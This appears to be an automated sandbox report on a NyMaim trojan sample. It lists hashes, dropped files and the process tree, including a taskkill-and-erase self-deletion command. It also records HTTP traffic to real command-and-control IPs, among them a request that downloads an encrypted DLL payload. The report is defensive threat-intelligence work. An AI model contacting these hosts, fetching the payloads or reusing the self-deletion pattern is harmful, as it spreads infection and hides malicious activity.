nymaim | fffc3847977d1244d741ead040bf11089388721069658cfc65d8ad11583f7aa1

Analysis

max time kernel
63s
max time network
65s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
13/01/2023, 02:16 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.5MB
MD5

9a4ad4fc7ab6d12de6e5eea6e7f93cef
SHA1

ca4511a28bc83c8403e8bf4a2b6469a75a1d4523
SHA256

fffc3847977d1244d741ead040bf11089388721069658cfc65d8ad11583f7aa1
SHA512

6a6f9bf442aa859e5bf4cb20ef944ff41c150d7a204acc814a9bc6ec2d7ff4d4e7a0b73240672956040b930ccd719ab3952c8c6bb97a7964b5e28140ecb03128
SSDEEP

24576:220Sx+lpZa4TgvTlsWEwfGaZbU4nsK5PjaFtKpXcYc825mVOymF56VpZpgXC75lY:228s4WTlMweahPNBaXKpXsNaZhd1qapk

Score

10^/10

nymaim discovery trojan

Malware Config

Extracted

Family

nymaim

45.139.105.171

85.31.46.167

Signatures

NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim

Executes dropped EXE 3 IoCs

pid	Process
1740	file.tmp
1280	MitFiles138.exe
1928	ZXHWxTb.exe

Loads dropped DLL 6 IoCs

pid	Process
1344	file.exe
1740	file.tmp
1740	file.tmp
1740	file.tmp
1740	file.tmp
1280	MitFiles138.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 17 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Mit Files\is-K02FC.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\language\is-NGU9E.tmp	file.tmp
File opened for modification	C:\Program Files (x86)\Mit Files\MitFiles138.exe	file.tmp
File created	C:\Program Files (x86)\Mit Files\is-VQ59S.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\language\is-TROR9.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\language\is-0N1H3.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\language\is-4TCRA.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\language\is-EHT9Q.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\is-NSHDN.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\is-CUGJA.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\unins000.dat	file.tmp
File created	C:\Program Files (x86)\Mit Files\language\is-BINE1.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\language\is-T6HBF.tmp	file.tmp
File opened for modification	C:\Program Files (x86)\Mit Files\unins000.dat	file.tmp
File created	C:\Program Files (x86)\Mit Files\language\is-H0RAI.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\language\is-OQNC2.tmp	file.tmp
File created	C:\Program Files (x86)\Mit Files\is-1EEIG.tmp	file.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
552	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1280	MitFiles138.exe
1280	MitFiles138.exe
1280	MitFiles138.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	552	taskkill.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 1344 wrote to memory of 1740	1344	file.exe	26
PID 1344 wrote to memory of 1740	1344	file.exe	26
PID 1344 wrote to memory of 1740	1344	file.exe	26
PID 1344 wrote to memory of 1740	1344	file.exe	26
PID 1344 wrote to memory of 1740	1344	file.exe	26
PID 1344 wrote to memory of 1740	1344	file.exe	26
PID 1344 wrote to memory of 1740	1344	file.exe	26
PID 1740 wrote to memory of 1280	1740	file.tmp	27
PID 1740 wrote to memory of 1280	1740	file.tmp	27
PID 1740 wrote to memory of 1280	1740	file.tmp	27
PID 1740 wrote to memory of 1280	1740	file.tmp	27
PID 1280 wrote to memory of 1928	1280	MitFiles138.exe	28
PID 1280 wrote to memory of 1928	1280	MitFiles138.exe	28
PID 1280 wrote to memory of 1928	1280	MitFiles138.exe	28
PID 1280 wrote to memory of 1928	1280	MitFiles138.exe	28
PID 1280 wrote to memory of 1648	1280	MitFiles138.exe	31
PID 1280 wrote to memory of 1648	1280	MitFiles138.exe	31
PID 1280 wrote to memory of 1648	1280	MitFiles138.exe	31
PID 1280 wrote to memory of 1648	1280	MitFiles138.exe	31
PID 1648 wrote to memory of 552	1648	cmd.exe	33
PID 1648 wrote to memory of 552	1648	cmd.exe	33
PID 1648 wrote to memory of 552	1648	cmd.exe	33
PID 1648 wrote to memory of 552	1648	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1344
- C:\Users\Admin\AppData\Local\Temp\is-R2QR6.tmp\file.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-R2QR6.tmp\file.tmp" /SL5="$90120,1330941,483328,C:\Users\Admin\AppData\Local\Temp\file.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Program Files (x86)\Mit Files\MitFiles138.exe
    "C:\Program Files (x86)\Mit Files\MitFiles138.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1280
  - - C:\Users\Admin\AppData\Roaming\{846ee340-7039-11de-9d20-806e6f6e6963}\ZXHWxTb.exe
      4⤵
      Executes dropped EXE
      PID:1928
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "MitFiles138.exe" /f & erase "C:\Program Files (x86)\Mit Files\MitFiles138.exe" & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1648
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "MitFiles138.exe" /f
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:552

Network

GET

http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte

MitFiles138.exe

Remote address:

45.139.105.171:80

Request

GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 45.139.105.171
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://107.182.129.235/storage/ping.php

MitFiles138.exe

Remote address:

107.182.129.235:80

Request

GET /storage/ping.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 0
Host: 107.182.129.235
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 17
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://107.182.129.235/storage/extension.php

MitFiles138.exe

Remote address:

107.182.129.235:80

Request

GET /storage/extension.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 107.182.129.235
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Pragma: public
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Transfer-Encoding: binary
Content-Length: 94224
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:35 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:16:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:17:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:17:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://171.22.30.106/library.php

MitFiles138.exe

Remote address:

171.22.30.106:80

Request

GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Jan 2023 02:17:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

45.139.105.171:80

http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte

http

MitFiles138.exe

775 B
620 B
7
5

HTTP Request

GET http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte

HTTP Response

200
107.182.129.235:80

http://107.182.129.235/storage/extension.php

http

MitFiles138.exe

2.8kB
97.9kB
43
76

HTTP Request

GET http://107.182.129.235/storage/ping.php

HTTP Response

200

HTTP Request

GET http://107.182.129.235/storage/extension.php

HTTP Response

200
171.22.30.106:80

http://171.22.30.106/library.php

http

MitFiles138.exe

5.5kB
5.8kB
25
34

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

HTTP Request

GET http://171.22.30.106/library.php

HTTP Response

200

No results found

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Mit Files\MitFiles138.exe

Filesize
1.8MB

MD5
b1ca226aa98e0cc606fc1c3c5047285b

SHA1
283fd7759b6ebf50fc2a43fcc5a2b2d6aea05a77

SHA256
cdbcf7962e565f41fff27f7143d7d3e2e834e62ad0745eb432341124c5e5006f

SHA512
a8d17aa50d89d763cf45325e6f71e87b52cf0141acb92be3180358c88fe4908652aa544c0ff1edd2d06fda00e35665de261aff254624df052d2f8d3b04ccf0a1

Download Submit
C:\Program Files (x86)\Mit Files\MitFiles138.exe

Filesize
1.8MB

MD5
b1ca226aa98e0cc606fc1c3c5047285b

SHA1
283fd7759b6ebf50fc2a43fcc5a2b2d6aea05a77

SHA256
cdbcf7962e565f41fff27f7143d7d3e2e834e62ad0745eb432341124c5e5006f

SHA512
a8d17aa50d89d763cf45325e6f71e87b52cf0141acb92be3180358c88fe4908652aa544c0ff1edd2d06fda00e35665de261aff254624df052d2f8d3b04ccf0a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-R2QR6.tmp\file.tmp

Filesize
695KB

MD5
415533bb40980951c966665cff9e2fe7

SHA1
fce396c8fa01876dd008f22c8be9a9b706f4aaec

SHA256
f688364bb17f03e53de641e7a0b0efefe30ac155fa9fa414a2150204ed9d3734

SHA512
3a8f88fa83e9f8be96fc9a0e8b47536455f50b1c511210d98fa178444b1e5ad1943cc3000e869f6dba4c782b48a3538d0b52d5e29ce3a692636aefc0e52083ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-R2QR6.tmp\file.tmp

Filesize
695KB

MD5
415533bb40980951c966665cff9e2fe7

SHA1
fce396c8fa01876dd008f22c8be9a9b706f4aaec

SHA256
f688364bb17f03e53de641e7a0b0efefe30ac155fa9fa414a2150204ed9d3734

SHA512
3a8f88fa83e9f8be96fc9a0e8b47536455f50b1c511210d98fa178444b1e5ad1943cc3000e869f6dba4c782b48a3538d0b52d5e29ce3a692636aefc0e52083ae

Download Submit
C:\Users\Admin\AppData\Roaming\{846ee340-7039-11de-9d20-806e6f6e6963}\ZXHWxTb.exe

Filesize
72KB

MD5
3fb36cb0b7172e5298d2992d42984d06

SHA1
439827777df4a337cbb9fa4a4640d0d3fa1738b7

SHA256
27ae813ceff8aa56e9fa68c8e50bb1c6c4a01636015eac4bd8bf444afb7020d6

SHA512
6b39cb32d77200209a25080ac92bc71b1f468e2946b651023793f3585ee6034adc70924dbd751cf4a51b5e71377854f1ab43c2dd287d4837e7b544ff886f470c

Download Submit
\Program Files (x86)\Mit Files\MitFiles138.exe

Filesize
1.8MB

MD5
b1ca226aa98e0cc606fc1c3c5047285b

SHA1
283fd7759b6ebf50fc2a43fcc5a2b2d6aea05a77

SHA256
cdbcf7962e565f41fff27f7143d7d3e2e834e62ad0745eb432341124c5e5006f

SHA512
a8d17aa50d89d763cf45325e6f71e87b52cf0141acb92be3180358c88fe4908652aa544c0ff1edd2d06fda00e35665de261aff254624df052d2f8d3b04ccf0a1

Download Submit
\Users\Admin\AppData\Local\Temp\is-8PEMO.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
\Users\Admin\AppData\Local\Temp\is-8PEMO.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-8PEMO.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-R2QR6.tmp\file.tmp

Filesize
695KB

MD5
415533bb40980951c966665cff9e2fe7

SHA1
fce396c8fa01876dd008f22c8be9a9b706f4aaec

SHA256
f688364bb17f03e53de641e7a0b0efefe30ac155fa9fa414a2150204ed9d3734

SHA512
3a8f88fa83e9f8be96fc9a0e8b47536455f50b1c511210d98fa178444b1e5ad1943cc3000e869f6dba4c782b48a3538d0b52d5e29ce3a692636aefc0e52083ae

Download Submit
\Users\Admin\AppData\Roaming\{846ee340-7039-11de-9d20-806e6f6e6963}\ZXHWxTb.exe

Filesize
72KB

MD5
3fb36cb0b7172e5298d2992d42984d06

SHA1
439827777df4a337cbb9fa4a4640d0d3fa1738b7

SHA256
27ae813ceff8aa56e9fa68c8e50bb1c6c4a01636015eac4bd8bf444afb7020d6

SHA512
6b39cb32d77200209a25080ac92bc71b1f468e2946b651023793f3585ee6034adc70924dbd751cf4a51b5e71377854f1ab43c2dd287d4837e7b544ff886f470c

Download Submit
memory/1280-70-0x0000000000400000-0x00000000013C2000-memory.dmp

Filesize
15.8MB

Download
memory/1280-78-0x0000000000400000-0x00000000013C2000-memory.dmp

Filesize
15.8MB

Download
memory/1280-86-0x0000000000400000-0x00000000013C2000-memory.dmp

Filesize
15.8MB

Download
memory/1280-71-0x0000000000400000-0x00000000013C2000-memory.dmp

Filesize
15.8MB

Download
memory/1280-73-0x0000000000400000-0x00000000013C2000-memory.dmp

Filesize
15.8MB

Download
memory/1280-83-0x0000000000400000-0x00000000013C2000-memory.dmp

Filesize
15.8MB

Download
memory/1280-79-0x0000000010000000-0x000000001001B000-memory.dmp

Filesize
108KB

Download
memory/1344-64-0x0000000000400000-0x000000000047D000-memory.dmp

Filesize
500KB

Download
memory/1344-54-0x0000000074F41000-0x0000000074F43000-memory.dmp

Filesize
8KB

Download
memory/1344-87-0x0000000000400000-0x000000000047D000-memory.dmp

Filesize
500KB

Download
memory/1344-55-0x0000000000400000-0x000000000047D000-memory.dmp

Filesize
500KB

Download
memory/1740-77-0x00000000035D0000-0x0000000004592000-memory.dmp

Filesize
15.8MB

Download
memory/1740-69-0x00000000035D0000-0x0000000004592000-memory.dmp

Filesize
15.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.